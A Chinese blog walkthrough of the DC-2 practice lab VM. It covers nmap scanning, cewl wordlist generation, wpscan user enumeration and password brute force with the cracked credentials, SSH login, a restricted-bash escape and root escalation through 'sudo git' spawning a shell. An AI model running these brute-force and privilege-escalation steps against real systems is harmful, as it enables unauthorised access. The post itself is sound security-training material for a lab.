一、信息收集
查询本机ip及目标靶机ip
本机ip:192.168.56.104,利用nmap查询同网段存活的ip,或者使用arp-scan -l
靶机地址:192.168.56.111
2、收集靶机开放端口
输入nmap -sS -sV -T5 -A 192.168.56.111 搜索相应开放的端口及服务还有版本
输入nmap -p- 192.168.56.111查询是否开放的其余端口
从上可以看出开放了80端口及7744端口,80端口需要进行DNS绑定,打开/etc/hosts,将靶机地址及dc-2保存在其中
3、对应端口进行尝试
在浏览器访问后,发现flag1
这里flag1提示需要用cewl工具,关于cewl工具之前的文章也有介绍,下面就直接用了
cewl http://dc-2/ -w xiaoli.txt
留着作为爆破用户名密码的文本,现在有了密码本,不知道用户名,使用wpscan去枚举用户名
wpscan --url http://dc-2/ -e #后续会出一篇关于wpscan的工具使用说明
发现了三个用户admin、jerry、tom,将这三个用户写进user.txt中,一会利用两个文件进行爆破密码
输入:wpscan --url http://dc-2/ -e -U user.txt -P xiaoli.txt
爆破出来jerry:adipiscing tom:parturient
二、Web渗透
利用爆破出来的用户名和密码进行登录,突然发现没有找到登录窗口,利用dirsearch进行目录爆破
dirsearch -u http://dc-2/
发现了登录窗口和config文件
登录jerry的账户在page中发现了flag2
这里说如果不能exploit 这个WordPress框架,可以用用别的方法,比如那会我们扫描出来的7744端口,可以利用我们爆破的用户进行远程ssh登录,本来ssh是22端口,被指定成了7744端口了,但没什么区别
这边发现用jerry的账户登录时,许可被拒绝,利用tom的账户登录,发现登录成功
这边发现flag3.txt但是cat不能使用,前面也是rbash,这里可以用vi,或者其他存在环境变量的命令,也或者可以重新设置环境变量进行rbash的绕过
BASH_CMDS[s]=/bin/bash
s
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin
这里flag3提示要切换jerry用户,利用su jerry,输入jerry的密码,切换过来
发现flag4并查看,发现要想得到最终flag需要获得root权限,底下有提示使用git提权
然后利用sudo和git,输入
sudo git -p --help config
!/bin/bash
即可提权成功
本次的DC系列第二个靶机就这样结束了,后续DC系列的靶机渗透将会继续更新,还有其他的靶场也会相继更新!希望能给需要的同学带来帮助!
努力学习,每天进步一点点!
259
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
